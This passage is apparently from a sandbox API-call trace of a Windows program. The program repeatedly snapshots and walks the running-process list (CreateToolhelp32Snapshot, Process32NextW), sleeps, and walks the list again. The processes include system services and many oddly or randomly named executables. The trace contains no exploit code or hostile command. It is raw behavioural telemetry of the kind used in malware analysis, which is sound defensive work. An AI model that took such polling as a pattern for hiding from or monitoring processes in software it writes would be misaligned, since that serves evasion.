Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0150.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0150.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0150.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0150.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0150.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0150.995] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0150.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0150.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0151.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0151.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0151.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0151.004] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0151.005] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0151.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0151.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0151.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0151.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0151.013] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0151.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0151.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0151.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0151.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.020] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.021] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0151.023] CloseHandle (hObject=0xc4) returned 1 [0151.023] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0151.029] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.030] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.031] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.032] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0151.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0151.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0151.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0151.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0151.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0151.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0151.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0151.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0151.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0151.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0151.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0151.138] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0151.139] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0151.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0151.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0151.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0151.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0151.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0151.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0151.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0151.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0151.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0151.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0151.211] CloseHandle (hObject=0xbc) returned 1 [0151.211] Sleep (dwMilliseconds=0x12c) [0151.532] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0151.538] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, 